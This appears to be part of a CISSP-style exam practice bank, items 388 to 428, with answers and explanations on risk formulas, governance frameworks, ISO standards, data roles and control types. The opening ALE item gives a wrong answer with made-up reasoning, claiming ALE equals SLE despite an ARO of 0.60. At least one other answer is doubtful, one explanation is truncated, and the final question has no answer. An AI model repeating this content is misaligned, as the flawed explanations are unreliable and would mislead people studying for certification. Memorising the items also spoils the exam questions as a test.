Answer: D. $425,000. Explanation: The Annualized Loss Expectancy (ALE) is calculated by first determining the Single Loss Expectancy (SLE), which is the product of the asset value and the exposure factor (EF). In this case, the SLE would be $500,000 multiplied by 0.85, resulting in $425,000. The ALE is then calculated by multiplying the SLE by the Annualized Rate of Occurrence (ARO), which is 0.60. However, since the ALE is essentially an annualized version of the SLE in this specific scenario, the ALE would also be $425,000. The residual risk of $200,000 is a separate metric that indicates the remaining risk after security measures have been applied and does not directly factor into the ALE calculation for this question.
389
The correct sequence for the following formulas should be A. ALE, residual risk, SLE, ARO B. ALE, ARO, SLE, residual risk C. ARO, SLE, ALE, residual risk D. SLE, ARO, ALE, residual risk
Answer: D. SLE, ARO, ALE, residual risk Explanation: The correct order of these formulas in the context of risk assessment is as follows: SLE (Single Loss Expectancy): This is calculated first as it represents the monetary loss expected from a single event. ARO (Annualized Rate of Occurrence): This is the frequency with which a threat is expected to occur within a year. ALE (Annualized Loss Expectancy): This is calculated by multiplying the SLE by the ARO; hence, it comes after SLE and ARO. Residual risk: This is the remaining risk after security controls have been applied and is typically assessed after understanding the potential losses (ALE). Thus, the proper order is Single Loss Expectancy (SLE), Annualized Rate of Occurrence (ARO), Annualized Loss Expectancy (ALE), and then residual risk.
390
What is the duration of copyright protection in both the United States and the European Union? A. The author’s life plus 20 years B. The author’s life plus 30 years C. The author’s life plus 70 years D. The author’s life plus 100 years
Answer: C. The author’s life plus 70 years Explanation: In both the United States and the European Union, copyright protection generally lasts for the duration of the author’s life plus 70 years. This time frame provides creators with a substantial period of control over their works, incentivizing further creation and innovation. It’s important to note that copyright laws can vary by country and type of work, so always refer to specific legislation for accurate information.
391
Which term refers to a flaw, loophole, oversight, or error that leaves an organization open to potential attack or harm? A. Risk B. Vulnerability C. Threat D. Exploit
Answer: B. Vulnerability Explanation: In the context of information security, a vulnerability refers to a flaw, loophole, oversight, or error in a system that could be exploited to cause harm. This could include software bugs, misconfigurations, weak passwords, etc. Vulnerabilities can be exploited by threats, such as hackers or malware, to perform unauthorized actions or gain unauthorized access. The process of identifying and addressing these vulnerabilities is a crucial part of any organization’s risk management and security strategy. The term “weakness” is quite often used when defining vulnerability.
392
Which of the following security documents is the broadest in scope? A. Procedures B. Standards C. Policies D. Baselines
Answer: C. Policies Explanation: Policies are the most general type of security document. They provide a high-level overview of an organization’s principles, rules, and expectations regarding information security. Policies set the foundation for all other security documents and guide the development of standards, procedures, and baselines, which are more specific and detail oriented. They are typically designed to guide decision-making and set the direction for an organization’s information security program.
393
Which role within an organization is responsible for assigning sensitivity labels to information assets? A. Management B. The auditor C. The user D. The owner
Answer: D. The owner Explanation: Within an organization, the owner of an information asset is typically responsible for assigning sensitivity labels. These labels represent the asset’s classification level and help guide how the asset should be handled, stored, transmitted, and destroyed. The owner, having the best understanding of the data’s value and sensitivity, is in the best position to assign these labels.
394
If the cost of implementing a countermeasure exceeds the value of the asset it’s meant to protect, which approach should be preferred? A. Do nothing B. Transfer the risk C. Mitigate the risk D. Increase the cost of exposure
Answer: B. Transfer the risk Explanation: When the cost of the countermeasure is more than the value of the asset, the most appropriate approach is typically to transfer the risk. This could be through insurance or by using third-party services. In this way, the organization can balance the cost of protection with the value of the asset. This doesn’t mean ignoring the risk (option A) or unnecessarily increasing costs (option D). Mitigating the risk (option C) might still be more expensive than the asset’s value.
395
Which ISO document serves as a standard for information security management? A. ISO 27001 B. ISO 27002 C. ISO 27004 D. ISO 27799
Answer: A. ISO 27001 Explanation: ISO 27001 is the international standard for information security management. It establishes the requirements and best practices for an Information Security Management System (ISMS). The other ISO standards listed here are also part of the ISO 27000 series, but they focus on different aspects of information security. For example, ISO 27002 provides a code of practice for information security controls, while ISO 27004 provides guidelines for the measurement of information security. ISO 27799 provides guidelines for health informatics – information security management in health using ISO/IEC 27002.
396
Which of the following accurately describes the risk management techniques? A. Risk acceptance, risk transference, risk avoidance, risk mitigation B. Risk acceptance, risk containment, risk avoidance, risk migration C. Risk acceptance, risk mitigation, risk containment, risk quantification D. Risk avoidance, risk migration, risk containment, risk quantification
Answer: A. Risk acceptance, risk transference, risk avoidance, risk mitigation Explanation: The four main risk management techniques are risk acceptance (accepting the potential loss and continuing operations), risk transference (shifting the potential loss to another party), risk avoidance (eliminating the risk by not engaging in a certain activity), and risk mitigation (reducing the impact of the risk). The other terms mentioned in the options, such as risk containment, risk migration, and risk quantification, are not standard risk management techniques.
397
Which of the following identifies a model that specifically targets security and not governance of an entire enterprise? A. The Zachman framework B. COBIT C. COSO D. SABSA
Answer: D. SABSA Explanation: The Sherwood Applied Business Security Architecture (SABSA) is a framework and methodology for enterprise security architecture and service management. It is specifically designed to focus on security, unlike other models like COBIT, COSO, or the Zachman framework, which are designed for broader governance of an entire enterprise. COBIT (Control Objectives for Information and Related Technologies) and COSO (Committee of Sponsoring Organizations of the Treadway Commission) are used for IT governance and enterprise risk management, respectively. The Zachman framework is an enterprise architecture framework, which is not specifically focused on security.
398
Which term allows the management to demonstrate that they took necessary steps to prevent negligence in lawsuits, even if their actions weren’t flawless? A. Due care B. Prudency C. Due diligence D. Threat agent
Answer: A. Due care Explanation: “Due care” refers to the effort made by an ordinarily prudent or reasonable party to prevent harm to another, taking the circumstances into account. It is the level of judgment, care, prudence, determination, and activity that a person would reasonably be expected to do under particular circumstances. In the context of lawsuits, demonstrating “due care” can help management show that they took all necessary precautions, even if the outcomes weren’t perfect. The other options – “prudency,” “due diligence,” and “threat agent” – are not specifically related to this context.
399
Which term refers to the method of gathering information by interviewing individuals anonymously? A. ISO/IEC 27001 B. Qualitative valuation C. The Delphi method D. Quantitative valuation
Answer: C. The Delphi method Explanation: The Delphi method is a structured communication technique, originally developed as a systematic, interactive forecasting method which relies on a panel of experts. The experts answer questionnaires in multiple rounds. After each round, a facilitator provides an anonymous summary of the experts’ forecasts from the previous round as well as the reasons they provided for their judgments. Thus, the Delphi method involves anonymous interviews or surveys, and it’s used to arrive at a group consensus. The other options – ISO/IEC 27001, qualitative valuation, and quantitative valuation – do not involve interviewing people anonymously.
400
What is the suitable standard for governing third-party providers? A. A nondisclosure agreement (NDA) B. An acceptable use policy C. The same level as employees D. The same level as defined by the ISC2 Code of Ethics
Answer: C. The same level as employees Explanation: Third-party providers should be governed at the same level as employees. This is because they often have access to the same sensitive information and systems as employees and therefore pose a similar risk. They should be subject to the same policies, procedures, and controls as employees to ensure information security. The other options – an NDA, an acceptable use policy, and the ISC2 Code of Ethics – are components of a broader governance strategy, but they are not comprehensive standards for third-party governance.
401
Which term refers to the expected cost associated with a single loss event? A. Annualized loss expectancy (ALE) B. Exposure factor (EF) C. Asset value (AV) D. Single loss expectancy (SLE)
Answer: D. Single loss expectancy (SLE) Explanation: The Single Loss Expectancy (SLE) represents the monetary loss expected from the occurrence of a risk on an asset once. It is calculated by multiplying the asset’s value (AV) by the exposure factor (EF), which represents the impact of the risk on the asset. The other terms – ALE, EF, and AV – are also important in risk assessment, but they do not directly represent the expected cost of a single loss event.
402
What is the rationale behind an enterprise reassessing the classification of its data files and records at least once a year? A. To adhere to the stipulations of the Internet Architecture Board B. Because the worth of data varies as time progresses C. Due to the necessity of mitigating new threats D. To safeguard the data’s confidentiality
Answer: B. Because the worth of data varies as time progresses Explanation: Data’s value can change over time based on its relevance, accuracy, and usefulness to the organization. Therefore, it’s essential to periodically reevaluate the classification of data files and records. While the other options may influence data management practices, they don’t directly explain why data classification should be reevaluated annually.
403
What should be the primary concern of management when establishing a governance framework? A. Enhancing profits B. Evading losses C. Catering to the needs of the business D. Ensuring safety
Answer: C. Catering to the needs of the business Explanation: A governance framework should be designed primarily to support the needs of the business. It should guide the organization in achieving its strategic objectives while managing risks and ensuring compliance. Although maximizing profits, avoiding losses, and ensuring safety are important, they are not the primary purpose of a governance framework.
404
When it comes to forensically examining digital evidence, which is the most accurate description of the priorities? A. Carry out an analysis of a bit-level duplicate of the disk. B. Examine the log files on the duplicated disk. C. Perform steganographic analysis on the duplicated disk. D. Detect any harmful code present on the duplicated disk.
Answer: A. Carry out an analysis of a bit-level duplicate of the disk. Explanation: When forensically analyzing digital evidence, the first priority is to create and analyze a bit-level clone of the disk. This ensures that the original evidence remains unaltered and preserves its admissibility in court. After creating the clone, further analysis like reviewing log files, detecting malicious code, or performing a steganographic analysis can be done.
405
Which of the following illustrates an instance of self-regulation? A. Sarbanes-Oxley (SOX) B. Gramm-Leach-Bliley Act (GLBA) C. Payment Card Industry Data Security Standard (PCI DSS) D. Third-party governance
Answer: C. Payment Card Industry Data Security Standard (PCI DSS) Explanation: The Payment Card Industry Data Security Standard (PCI DSS) is an example of self-regulation. It’s a standard created by the major credit card companies to protect cardholder data. The companies themselves enforce compliance with the standard, not a governmental or external regulatory body. In contrast, Sarbanes-Oxley (SOX) and the Gramm-Leach-Bliley Act (GLBA) are examples of governmental regulation, and third-party governance is a broader concept that includes various mechanisms of control over third-party relationships.
406
What are the possible actions that can be taken with residual risk? A. It can be either allocated or accepted. B. It can be either pinpointed or appraised. C. It can be either lessened or computed. D. It can be either unveiled or evaluated.
Answer: A. It can be either allocated or accepted. Explanation: Residual risk is the remaining risk after controls and mitigation efforts have been applied. This risk can either be accepted (if it’s within the organization’s risk tolerance) or it can be assigned/transferred to another entity, such as through insurance.
407
Which element does not constitute part of risk analysis? A. Assets B. Threats C. Vulnerabilities D. Countermeasures
Answer: D. Countermeasures Explanation: Risk analysis involves the identification and assessment of assets, threats, and vulnerabilities. Countermeasures, however, are a response to the identified risk, applied after risk analysis to mitigate the risk. They are not a part of the analysis itself.
408
What is it that security safeguards and controls are incapable of doing? A. Risk reduction B. Risk avoidance C. Risk transfer D. Risk analysis
Answer: D. Risk analysis Explanation: Security safeguards and controls are used to reduce, avoid, or transfer risk. However, they do not perform risk analysis. Risk analysis is a separate process that identifies and assesses risk, which then informs the appropriate safeguards and controls.
409
The quantity of risk an organization can endure should be based on what? A. Technological level B. Acceptable level C. Affordable level D. Measurable level
Answer: B. Acceptable level Explanation: The amount of risk an organization can handle or tolerate is based on its acceptable level of risk. This level is determined by factors such as the organization’s strategic goals, resources, and risk appetite. While affordability and measurability might influence the decision, the acceptable level is the determining factor.
410
Which of the following best describes the relationship between CobiT and ITIL? A. CobiT is a model for IT governance, whereas ITIL is a model for corporate governance. B. CobiT provides a corporate governance roadmap, whereas ITIL is a customizable framework for IT service management. C. CobiT defines IT goals, whereas ITIL provides the process level steps on how to achieve them. D. CobiT provides a framework for achieving security goals, whereas ITIL defines a framework for achieving IT service level goals.
C. The Control Objectives for Information and related Technology (CobiT) is a framework developed by the Information Systems Audit and Control Association (ISACA) and the IT Governance Institute (ITGI). It defines goals for the controls that should be used to properly manage IT and ensure IT maps to business needs, not specifically just security needs. The Information Technology Infrastructure Library (ITIL) is the de facto standard of best practices for IT service management. A customizable framework, ITIL provides the goals, the general activities necessary to achieve these goals, and the input and output values for each process required to meet these determined goals. In essence, CobiT addresses “what is to be achieved,” while ITIL addresses “how to achieve it.” A is incorrect because, while CobiT can be used as a model for IT governance, ITIL is not a model for corporate governance. Actually, Committee of Sponsoring Organizations of the Treadway Commission (COSO) is a model for corporate governance. CobiT is derived from the COSO framework. You can think of CobiT as a way to meet many of the COSO objectives, but only from the IT perspective. In order to achieve many of the objectives addressed in CobiT, an organization can use ITIL, which provides process-level steps for achieving IT service management objectives. B is incorrect because, as previously stated, CobiT can be used as a model for IT governance, not corporate governance. COSO is a model for corporate governance. The second half of the answer is correct. ITIL is a customizable framework that is available as a series of books or online, for IT service management. D is incorrect because CobiT defines goals for the controls that should be used to properly manage IT and ensure IT maps to business needs, not just IT security needs. ITIL provides steps for achieving IT service management goals as they relate to business needs. ITIL was created because of the increased dependence on information technology to meet business needs.
411
Which of the following is not included in a risk assessment? A. Discontinuing activities that introduce risk B. Identifying assets C. Identifying threats D. Analyzing risk in order of cost or criticality
A. Discontinuing activities that introduce risk is a way of responding to risk through avoidance. For example, there are many risks surrounding the use of instant messaging (IM) in the enterprise. If a company decides not to allow IM activity because there is not enough business need for its use, then prohibiting this service is an example of risk avoidance. Risk assessment does not include the implementation of countermeasures such as this.
B is incorrect because identifying assets is part of a risk assessment, and the question asks to identify what is not included in a risk assessment. In order to determine the value of assets, those assets must first be identified. Asset identification and valuation are also important tasks of risk management. C is incorrect because identifying threats is part of a risk assessment, and the question asks to identify what is not included in a risk assessment. Risk is present because of the possibility of a threat exploiting a vulnerability. If there were no threats, there would be no risk. Risk ties the vulnerability, threat, and likelihood of exploitation to the resulting business impact. D is incorrect because analyzing risk in order of cost or criticality is part of the risk assessment process, and the question asks to identify what is not included in a risk assessment. A risk assessment researches and quantifies the risk a company faces. Dealing with risk must be done in a cost-effective manner. Knowing the severity of the risk allows the organization to determine how to address it effectively.
412
Sue has been tasked with implementing a number of security controls, including antivirus and antispam software, to protect the company’s e-mail system. What type of approach is her company taking to handle the risk posed by the system? A. Risk mitigation B. Risk acceptance C. Risk avoidance D. Risk transference
A. Risk can be dealt with in four basic ways: transfer it, avoid it, reduce it, or accept it. By implementing security controls such as antivirus and antispam software, Sue is reducing the risk posed by her company’s e-mail system. This is also referred to as risk mitigation, where the risk is decreased to a level considered acceptable. In addition to the use of IT security controls and countermeasures, risk can be mitigated by improving procedures, altering the environment, erecting barriers to the threat, and implementing early detection methods to stop threats as they occur, thereby reducing their possible damage.
413
The integrity of data is not related to which of the following? A. Unauthorized manipulation or changes to data B. The modification of data without authorization C. The intentional or accidental substitution of data D. The extraction of data to share with unauthorized entities
D. The extraction of data to share with unauthorized entities is a confidentiality issue, not an integrity issue. Confidentiality ensures that the necessary level of secrecy is enforced at each junction of data processing and prevents unauthorized disclosure. This level of confidentiality should prevail while data resides on systems and devices within the network, as it is transmitted, and once it reaches its destination. Integrity, on the other hand, is the principle that signifies the data has not been changed or manipulated in an unauthorized manner. A is incorrect because integrity is related to the unauthorized manipulation or changes to data. Integrity is upheld when any unauthorized modification is prevented. Hardware, software, and communication mechanisms must work in concert to maintain and process data correctly and move data to intended destinations without unexpected alteration. The systems and network should be protected from outside interference and contamination. B is incorrect because the modification of data without authorization is related to integrity. Integrity is about protecting data so that it cannot be changed either by users or other systems that do not have the rights to do so. C is incorrect because the intentional or accidental substitution of data is related to integrity. Along with the assurance that data is not modified by unauthorized entities, integrity is upheld when the assurance of the accuracy and reliability of the information and systems is provided. An environment that enforces integrity prevents attackers, for example, from inserting a virus, logic bomb, or backdoor into a system that could corrupt or replace data. Users usually affect a system or its data’s integrity by mistake (although internal users may also commit malicious deeds). For example, a user may insert incorrect values into a data processing application that ends up charging a customer $3,000 instead of $300.
414
There are several methods an intruder can use to gain access to company assets. Which of the following best describes masquerading? A. Changing an IP packet’s source address B. Elevating privileges to gain access C. An attempt to gain unauthorized access as another user D. Creating a new authorized user with hacking tools
C. Masquerading is an attempt to gain unauthorized access by impersonating an authorized user. Masquerading is commonly used by attackers carrying out phishing attacks and has been around for a long time. For example, in 1996 hackers posed as AOL staff members and sent messages to victims asking for their passwords in order to verify correct billing information or verify information about the AOL accounts. Today, phishers often masquerade as large banking companies and well-known Internet entities like Amazon.com and eBay. Masquerading is a type of active attack because the attacker is actually doing something instead of sitting back and gathering data. A is incorrect because changing an IP packet’s source address is an example of masquerading and not a definition of masquerading. IP spoofing is the act of presenting false information within packets, to trick other systems and hide the origin of the message. This is usually done by hackers so that their identity cannot be successfully uncovered. B is incorrect because elevating privileges is not part of masquerading. Elevating privileges is often the next step after being able to penetrate a system successfully, but it does not have anything to do directly with fooling a user or system about the attacker’s true identity. D is incorrect because masquerading involves commonly posing as an authorized user that already exists in the system the attacker is attempting to access. It is common for the attacker then to attempt to create a new authorized user account on a compromised system, but successful masquerading has to happen first.
415
A number of factors should be considered when assigning values to assets. Which of the following is not used to determine the value of an asset? A. The asset’s value in the external marketplace B. The level of insurance required to cover the asset C. The initial and outgoing costs of purchasing, licensing, and supporting the asset D. The asset’s value to the organization’s production operations
B. The level of insurance required to cover the asset is not a consideration when assigning values to assets. It is actually the other way around: By knowing the value of an asset, an organization can more easily determine the level of insurance coverage to purchase for that asset. In fact, understanding the value of an asset is the first step to understanding what security mechanisms should be put in place and what funds should go toward protecting it. This knowledge can also help companies perform effective cost/benefit analyses, understand exactly what is at risk, and comply with legal and regulatory requirements. A is incorrect because the asset’s value in the external marketplace is a factor that should be considered when determining the value of an asset. It should also include the value the asset might have to competitors or what others are willing to pay for a given asset. C is incorrect because the initial and outgoing costs of purchasing, licensing, and supporting the asset are considerations when determining the cost and value of an asset. The asset must be cost-effective to the business directly. If the supporting requirements of maintaining the asset outweigh the business need for the asset, its value will decrease. D is incorrect because it is a factor to be considered when determining an asset’s value. The asset’s value to the organization’s production operations is the determination of cost to an organization if the asset is not available for a certain period of time. Along these same lines, the asset’s usefulness and role in the organization should be considered as well as the operational and production activities affected if the asset is unavailable. If the asset helps operations it is valuable; the trick is to figure out how valuable.
416
Jill is establishing a companywide sales program that will require different user groups with different privileges to access information on a centralized database. How should the security manager secure the database? A. Increase the database’s security controls and provide more granularity. B. Implement access controls that display each user’s permissions each time they access the database. C. Change the database’s classification label to a higher security status. D. Decrease the security so that all users can access the information as needed.
A. The best approach to securing the database in this situation would be to increase the controls and assign very granular permissions. These measures would ensure that users cannot abuse their privileges and the confidentiality of the information would be maintained. Granularity of permissions gives network administrators and security professionals additional control over the resources they are charged with protecting, and a fine level of detail enables them to give individuals just the precise level of access they need. B is incorrect because implementing access controls that display each user’s permissions each time they access the database is an example of one control. It is not the overall way of dealing with user access to a full database of information. This may be an example of increasing database security controls, but it is only one example and more would need to be put into place. C is incorrect because the classification level of the information in the database was previously determined based on its confidentiality, integrity, and availability levels. These levels do not change simply because more users need access to the data. Thus, you would never increase or decrease the classification level of information when more users or groups need to access that information. Increasing the classification level would only mean a smaller subset of users could access the database. D is incorrect because it puts data at risk. If security is decreased so that all users can access it as needed, then users with lower privileges will be able to access data of higher classification levels. Lower security also makes it easier for intruders to break into the database. As stated in answer C, a classification level is not changed just because the number of users who need to access the data increases or decreases.
417
As his company’s CISO, George needs to demonstrate to the Board of Directors the necessity of a strong risk management program. Which of the following should George use to calculate the company’s residual risk? A. threats × vulnerability × asset value = residual risk B. SLE × frequency = ALE, which is equal to residual risk C. (threats × vulnerability × asset value) × control gap = residual risk D. (total risk – asset value) × countermeasures = residual risk
C. Countermeasures are implemented to reduce overall risk to an acceptable level. However, no system or environment is 100 percent secure, and with every countermeasure some risk remains. The leftover risk after countermeasures are implemented is called residual risk. Residual risk differs from total risk, which is the risk companies face when they choose not to implement any countermeasures. While the total risk can be determined by calculating threats × vulnerability × asset value = total risk, residual risk can be determined by calculating (threats × vulnerability × asset value) × control gap = residual risk. Control gap is the amount of protection the control cannot provide. A is incorrect because threats × vulnerability × asset value does not equal residual risk. It is the equation to calculate total risk. Total risk is the risk a company faces in the absence of any security safeguards or actions to reduce the overall risk exposure. The total risk is reduced by implementing safeguards and countermeasures, leaving the company with residual risk—or the risk left over after safeguards are implemented. B is incorrect because SLE × frequency is the equation to calculate the annualized loss expectancy (ALE) as a result of a threat exploiting a vulnerability and the business impact. The frequency is the threat’s annual rate of occurrence (ARO). The ALE is not equal to residual risk. ALE indicates how much money a specific type of threat is likely to cost the company over the course of a year. Knowing the real possibility of a threat and how much damage, in monetary terms, the threat can cause is important in determining how much should be spent to try and protect against that threat in the first place. D is incorrect and is a distracter answer. There is no such formula like this used in risk assessments. The actual equations are threats × vulnerability × asset value = total risk; and (threats × vulnerability × asset value) × control gap = residual risk.
418
Susan, an attorney, has been hired to fill a new position at Widgets Inc. The position is Chief Privacy Officer (CPO). What is the primary function of her new role? A. Ensuring the protection of partner data B. Ensuring the accuracy and protection of company financial information C. Ensuring that security policies are defined and enforced D. Ensuring the protection of customer, company, and employee data
D. The Chief Privacy Officer (CPO) position is being created by companies in response to the increasing demands on organizations to protect myriad types of data. The CPO is responsible for ensuring the security of customer, company, and employee data, which keeps the company free from legal prosecution and—hopefully—out of the headlines. Thus, the CPO is directly involved with setting policies on how data is collected, protected, and distributed to third parties. The CPO is usually an attorney and reports to the Chief Security Officer. A is incorrect because protecting partner data is just a small subset of all the data the CPO is responsible for protecting. CPOs are responsible for ensuring the protection of customer, company, and employee data. Partner data is among the various types of data that the CPO is responsible for protecting. In addition, the CPO is responsible for knowing how its company’s suppliers, partners, and other third parties are protecting its sensitive information. Many times, companies will need to review these other parties (which have copies of data needing protection). B is incorrect because the accuracy of financial information is the responsibility of its data owner—the Chief Financial Officer (CFO). The CFO is responsible for the corporation’s account and financial activities, and the overall financial structure of the organization. The CPO is responsible for helping to ensure the secrecy of this data, but not the accuracy of the data. The financial information is also a small subset of all the data types the CPO is responsible for protecting. C is incorrect because the definition and enforcement of security policies is the responsibility of senior management, commonly delegated to the CISO or CSO—not the CPO. A security policy is an overall general statement that dictates what role security plays within the organization. The CPO’s responsibilities as they relate to policies are to contribute to the setting of data protection policies, including how data is collected, protected, and distributed to third parties.
419
Jared plays a role in his company’s data classification system. In this role, he must practice due care when accessing data and ensure that the data is used only in accordance with allowed policy while abiding by the rules set for the classification of the data. He does not determine, maintain, or evaluate controls, so what is Jared’s role? A. Data owner B. Data custodian C. Data user D. Information systems auditor
C. Any individual who routinely uses data for work-related tasks is a data user. Users must have the necessary level of access to the data to perform the duties within their position and are responsible for following operational security procedures to ensure the data’s confidentiality, integrity, and availability to others. This means that users must practice due care and act in accordance with both security policy and data classification rules. A is incorrect because the data owner has a greater level of responsibility in the protection of the data. Data owners are responsible for classifying the data, regularly reviewing classification levels, and delegating the responsibility of the data protection duties to the data custodian. The data owner is typically a manager or executive in the organization and is held responsible when it comes to protecting the company’s information assets. B is incorrect because the data custodian is responsible for the implementation and maintenance of security controls as dictated by the data owner. In other words, the data custodian is the technical caretaker of the controls that protects the data. Her duties include making backups, restoring data, implementing and maintaining countermeasures, and administering controls. D is incorrect because an information systems auditor is responsible for evaluating controls. After evaluating the controls, the auditor provides reports to management, illustrating the mapping between the set acceptable risk level of the organization and her findings. This does not have to do with using the data or practicing due care with the use of data.
420
Risk assessment has several different methodologies. Which of the following official risk methodologies was not created for the purpose of analyzing security risks? A. FAP B. OCTAVE C. ANZ 4360 D. NIST SP 800-30
C. While ANZ 4360 can be used to analyze security risks, it was not created for that purpose. It takes a much broader approach to risk management than other risk assessment methodologies, such as NIST and OCTAVE, which focus on IT threats and information security risks. ANZ 4360 can be used to understand a company’s financial, capital, human safety, and business decisions risks. A is incorrect because there is no formal FAP risk analysis approach. It is a distracter answer. B is incorrect because OCTAVE focuses on IT threats and information security risks. OCTAVE is meant to be used in situations where people manage and direct the risk evaluation for information security within their organization. The organization’s employees are given the power to determine the best approach for evaluating security. D is incorrect because NIST SP 800-30 is specific to IT threats and how they relate to information security risks. It focuses mainly on systems. Data is collected from network and security practice assessments, and from people within the organization. The data is then used as input values for the risk analysis steps outlined in the 800-30 document.
421
Which of the following is not a characteristic of a company with a security governance program in place? A. Board members are updated quarterly on the company’s state of security. B. All security activity takes place within the security department. C. Security products, services, and consultants are deployed in an informed manner. D. The organization has established metrics and goals for improving security.
B. If all security activity takes place within the security department, then security is working within a silo and is not integrated throughout the organization. In a company with a security governance program, security responsibilities permeate the entire organization, from executive management down the chain of command. A common scenario would be executive management holding business unit managements responsible for carrying out risk management activities for their specific business units. In addition, employees are held accountable for any security breaches they participate in, either maliciously or accidentally. A is incorrect because security governance is a set of responsibilities and practices exercised by the board and executive management of an organization with the goal of providing strategic direction, ensuring that objectives are achieved, ascertaining that risks are managed appropriately, and verifying that the organization’s resources are used responsibly. An organization with a security governance program in place has a board of directors that understands the importance of security and is aware of the organization’s security performance and breaches. C is incorrect because security governance is a coherent system of integrated security components that includes products, personnel, training, processes, etc. Thus, an organization with a security governance program in place is likely to purchase and deploy security products, managed services, and consultants in an informed manner. They are also constantly reviewed to ensure they are cost-effective. D is incorrect because security governance requires performance measurement and oversight mechanisms. An organization with a security governance program in place continually reviews its processes, including security, with the goal of continued improvement. On the other hand, an organization that lacks a security governance program is likely to march forward without analyzing its performance and therefore repeatedly makes similar mistakes.
422
Michael is charged with developing a classification program for his company. Which of the following should he do first? A. Understand the different levels of protection that must be provided. B. Specify data classification criteria. C. Identify the data custodians. D. Determine protection mechanisms for each classification level.
A. Before Michael begins developing his company’s classification program, he must understand the different levels of protection that must be provided. Only then can he develop the necessary classification levels and their criteria. One company may choose to use only two layers of classification, while another may choose to use more. Regardless, when developing classification levels, he should keep in mind that too many or too few classification levels will render the classification ineffective; there should be no overlap in the criteria definitions between classification levels; and classification levels should be developed for both data and software. B is incorrect because data classification criteria cannot be established until the classification levels themselves have been defined. The classification criteria are used by data owners to know what classification should be assigned to specific data. Basically, the classifications are defined buckets and the criteria help data owners determine what bucket each data set should be put into. C is incorrect because there is no need to identify the data custodians until classification levels are defined, criteria are determined for how data are classified, and the data owner has indicated the classification of the data she is responsible for. Remember, the data custodian is responsible for implementing and maintaining the controls specified by the data owner. D is incorrect because protection mechanisms for each classification level cannot be determined until the classification levels themselves are defined based on the different levels of protection that are required. The types of controls implemented per classification will depend upon the level of protection that management and the security team have determined is needed.
423
ISO/IEC 27000 is part of a growing family of ISO/IEC information security management systems (ISMS) standards. It comprises information security standards published jointly by the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC). Which of the following provides an incorrect mapping of the individual standards that make up this family of standards? A. ISO/IEC 27002 Code of practice for information security management B. ISO/IEC 27003 Guideline for ISMS implementation C. ISO/IEC 27004 Guideline for information security management measurement and metrics framework D. ISO/IEC 27005 Guideline for bodies providing audit and certification of information security management systems
D. The ISO/IEC 27005 standard is the guideline for information security risk management. ISO/IEC 27005 is an international standard for how risk management should be carried out in the framework of an information security management system (ISMS). A is incorrect because ISO/IEC 27002 is the code of practice for information security management; thus, it has a correct mapping. ISO/IEC 27002 provides best practice recommendations and guidelines as they pertain to initiating, implementing, or maintaining information security management systems (ISMS). B is incorrect because ISO/IEC 27003 is the guideline for ISMS implementation; thus, it has a correct mapping. It focuses on the critical aspects needed for successful design and implementation of an information security management system (ISMS) in accordance with ISO/IEC 27001:2005. It describes the process of ISMS specification and design from inception to the production of implementation plans. C is incorrect because ISO/IEC 27004 is the guideline for information security management measurement and metrics framework; thus, it has a correct mapping. It provides guidance on the development and use of measures and measurement in order to assess the effectiveness of an implemented information security management system (ISMS) and controls or groups of controls, as specified in ISO/IEC 2700
424
Barry has just been hired as the company security officer at an international financial institution. He has reviewed the company’s data protection policies and procedures. He sees that the company stores its sensitive data within a secured database. The database is located in a network segment all by itself, which is monitored by a network-based intrusion detection system. The database is hosted on a server kept within a server room, which can only be accessed by personnel with the correct PIN value and smart card. Barry finds that the sensitive data backups are not being properly secured and requests that the company implement a secure courier service that moves backup tapes to a secured location. His management states that this option is too expensive, so Barry implements a local hierarchy storage management system that properly protects the sensitive data. Which of the following best describes the control types the company originally had in place? A. Administrative preventive controls are the policies and procedures. Technical preventive controls are securing the system, network segmentation, and intrusion detection system. Physical detective controls are the physical location of the database and PIN and smart card access controls. B. Administrative preventive controls are the policies. Technical preventive controls are securing the system and intrusion detection system. Physical preventive controls are the physical location of the database and PIN and smart card access controls. C. Administrative corrective controls are the policies and procedures. Technical preventive controls are securing the system, network segmentation, and intrusion detection system. Physical preventive controls are the physical location of the database and PIN and smart card access controls. D. Administrative preventive controls are the policies and procedures. Technical preventive controls are securing the system and network segmentation. The technical detective control is the intrusion detection system. Physical preventive controls are the physical location of the database and PIN and smart card access controls.
D
425
Barry has just been hired as the company security officer at an international financial institution. He has reviewed the company’s data protection policies and procedures. He sees that the company stores its sensitive data within a secured database. The database is located in a network segment all by itself, which is monitored by a network-based intrusion detection system. The database is hosted on a server kept within a server room, which can only be accessed by personnel with the correct PIN value and smart card. Barry finds that the sensitive data backups are not being properly secured and requests that the company implement a secure courier service that moves backup tapes to a secured location. His management states that this option is too expensive, so Barry implements a local hierarchy storage management system that properly protects the sensitive data. The storage management system that Barry put into place is referred to as which of the following? A. Administrative control B. Compensating control C. Physical control D. Confidentiality control
B
426
Barry has just been hired as the company security officer at an international financial institution. He has reviewed the company’s data protection policies and procedures. He sees that the company stores its sensitive data within a secured database. The database is located in a network segment all by itself, which is monitored by a network-based intrusion detection system. The database is hosted on a server kept within a server room, which can only be accessed by personnel with the correct PIN value and smart card. Barry finds that the sensitive data backups are not being properly secured and requests that the company implement a secure courier service that moves backup tapes to a secured location. His management states that this option is too expensive, so Barry implements a local hierarchy storage management system that properly protects the sensitive data. Which are the two most common situations that require the type of control covered in the scenario to be implemented? A. Defense-in-depth is required, and the current controls only provide one protection layer. B. Primary control costs too much or negatively affects business operations. C. Confidentiality is the highest concern in a situation where defense-in-depth is required. D. Availability is the highest concern in a situation where defense-in-depth is required
B
427
For intrusion detection and prevention system capabilities, stateful protocol analysis uses which of the following? 1. Blacklists 2. Whitelists 3. Threshold 4. Program code viewing a. 1 and 2 b. 1, 2, and 3 c. 3 only d. 1, 2, 3, and 4
d. Stateful protocol analysis (also known as deep packet inspection) is the process of comparing predetermined profiles of generally accepted definitions of benign protocol activity for each protocol state against observed events to identify deviations. Stateful protocol analysis uses blacklists, whitelists, thresholds, and program code viewing to provide various security capabilities. A blacklist is a list of discrete entities, such as hosts or applications, that have been previously determined to be associated with malicious activity. A whitelist is a list of discrete entities, such as hosts or applications, known to be benign. Thresholds set the limits between normal and abnormal behavior of the intrusion detection and prevention system (IDPS). Program code viewing and editing features are established to see the detection-related programming code in the IDPS.
428
Electronic authentication begins with which of the following? a. Token b. Credential c. Subscriber d. Credential service provider
